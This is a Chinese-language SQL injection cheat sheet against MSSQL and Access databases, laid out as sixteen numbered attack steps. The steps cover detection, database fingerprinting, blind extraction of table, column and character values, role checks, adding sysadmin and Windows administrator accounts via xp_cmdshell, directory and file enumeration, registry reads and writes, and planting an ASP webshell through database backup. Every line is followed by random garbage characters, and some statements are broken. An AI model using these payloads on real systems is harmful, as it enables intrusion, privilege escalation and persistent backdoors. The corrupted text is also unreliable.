1.判断是否有注入;and 1=1 ;and 1=2 \��t��P*Pz
2.初步判断是否是mssql ;and user>0 i�P1yy5�T
H29�vuGQjq
3.注入参数是字符'and [查询条件] and ''=' k7(lw�EgNG
�w{4��#Q�[
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �M<�Y{�C�s
�!�FvL2�L
5.判断数据库系统 � RcZ&�/MY
�v�Yq"W%�
;and (select count(*) from sysobjects)>0 mssql kovJ����9�
pIK�fTkSqH
;and (select count(*) from msysobjects)>0 access E
`V�?�Io
>4Qj��+ou
�����>LB*5
�N(O*�"1b
6.猜数据库 ;and (select Count(*) from [数据库名])>0 r?pN�-x$M=
�D��v4��H^
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 gf��^y3F[\
�c(!pcB��8
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 6�QN�Z/Ox:
q�2;CvoF
9.(1)猜字段的ascii值(access) .k%/JF�91n
6�LqF*$+$`
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Hr \v�u`p$
kPO�+M~+n�
(2)猜字段的ascii值(mssql) w8#j�i 1gX
i8�#:y`a�i
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 162�Dj�$�
&G�?w*w�_n
10.测试权限结构(mssql) ?�.c�:�k;j
�]@CXUa,>a
0�%yP�uY�>
w� B�oP&�l
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- f?�(g5o*2�
o?I`n*u�"X
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �j{/5i`�5m
�V�}FH5z
|
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- r&~�]�6
U�
Q@�*�9�|6-
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ?!��3u�?Kd
/PG%Y]l�0b
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- z�9v70��
q
vOl�3u�tu7
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- +=*ND<$n/E
//bQD�>NBO
;and 1=(select IS_MEMBER('db_owner'));-- ET���%�F+�
|ly�s�pD��
�hW\'E�J�
iEbW[sX[�4
11.添加mssql和系统的帐户 /2 �qxJ�vZ
�}��|j�#C[
;exec master.dbo.sp_addlogin username;-- G{�zxP%[�E
;exec master.dbo.sp_password null,username,password;-- _*xY�>?Aq�
���|�`+ (O
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �:��z\||�f
k�Zfj"+p_S
;exec master.dbo.xp_cmdshell 'net user username password wBE�B�j7(y
c4bv�Jy��8
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 7O��i�<_b
�gyU�=v{].
;exec master.dbo.xp_cmdshell 'net user username password /add';-- +KOhD�tLMG
}}Gki�pp��
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- \�vuW��ypo
!P6?�n��S�
;Q[E>j�?w=
(���v�$
�i
12.(1)遍历目录 OJ.oH�f=K!
�"5<YN�#
;create table dirs(paths varchar(100), id int) :zpT Gk8Z�
GY"c1�KE$
;insert dirs exec master.dbo.xp_dirtree 'c:\' �:J+ANI�RI
jV<5�GW�q
;and (select top 1 paths from dirs)>0 N�5�tFEV'G
�]jR-<l8I-
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Yfy"�;�C7X
C\0�,�D�9
>}d�6)s| �
9QeBz`lm�)
(2)遍历目录 <1`Mj��P*w
O�f��eM�;)
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- :\%h�v�>}|
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 r���Y$�wC%
�ppeF,���Q
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 OK
z5;#�S=
o��q��(W�|
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ��n�d5.Py$
?gjkgCbC#
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ler$�HA%F]
W�~s:SN���
_6]tbn�i?v
�bvT$/�(7�
13.mssql中的存储过程 LwH+�X:�?i
t{�Ks}9�B
xp_regenumvalues 注册表根键, 子键 \#ggu��q?[
\t? ;p-+ta
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 !�HXyvyDN�
I}awembw g
xp_regread 根键,子键,键值名 u5`b"��)a
%iZ~RTY6 !
;exec xp_regread q^L�"�@Q5;
o ,8;=f,�7
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 +KIBbX��F7
_�9S"rH[�
xp_regwrite 根键,子键, 值名, 值类型, 值 q~{O^,4�S�
�*]DO3�Zw'
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �zJOyr"B'8
\8k4v#��wH
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 !VHw*f�L|r
�J�~N!�. i
xp_regdeletevalue 根键,子键,值名 MI`<U:-�lP
1b@]�^U�e
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 [�5GzY`/�m
dX-j3lM�:#
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 FQ/z,it_i
i{�r[zA�]$
�)W1[{���?
w�i�d�����
14.mssql的backup创建webshell q�%XjJ -s:
�@J6�V�,��
use model C
��*7x7|z
�9q2�x�}
create table cmd(str image); cxIA�I=�JK
z\K-KD{A�d
insert into cmd(str) values (''); K)�eyFc��
�.AF\[I�Q�
backup database model to disk='c:\l.asp'; U:|:Y=�O?Q
(
;KTV*��1
�On,z��#�A
�CH�6�;jo]
15.mssql内置函数 0�4��a@���
�0�Q]{�r )
;and (select @@version)>0 获得Windows的版本号 ,X��\qlT5C
�T�|5uywA|
;and user_name()='dbo' 判断当前系统的连接用户是不是sa .Rb�PO�#(�
O81'i2M�J9
;and (select user_name())>0 爆当前系统的连接用户 uzS;&�-nA�
_i�u^VK,}�
;and (select db_name())>0 得到当前连接的数据库 k�?Njge6�@
C`8.���8�
�jT�qE�V(
k:�&B
b��"
16.简洁的webshell �]'z�� 5%'
"}0)~,{x�B
use model �Ls�&-8�
-�R`ni��tf
create table cmd(str image); Y{�8�}z
ZD
�$$'[�%��
insert into cmd(str) values (''); �c7�R6.T��
!]&+g'aC�3
backup database model to disk='g:\wwwtest\l.asp';
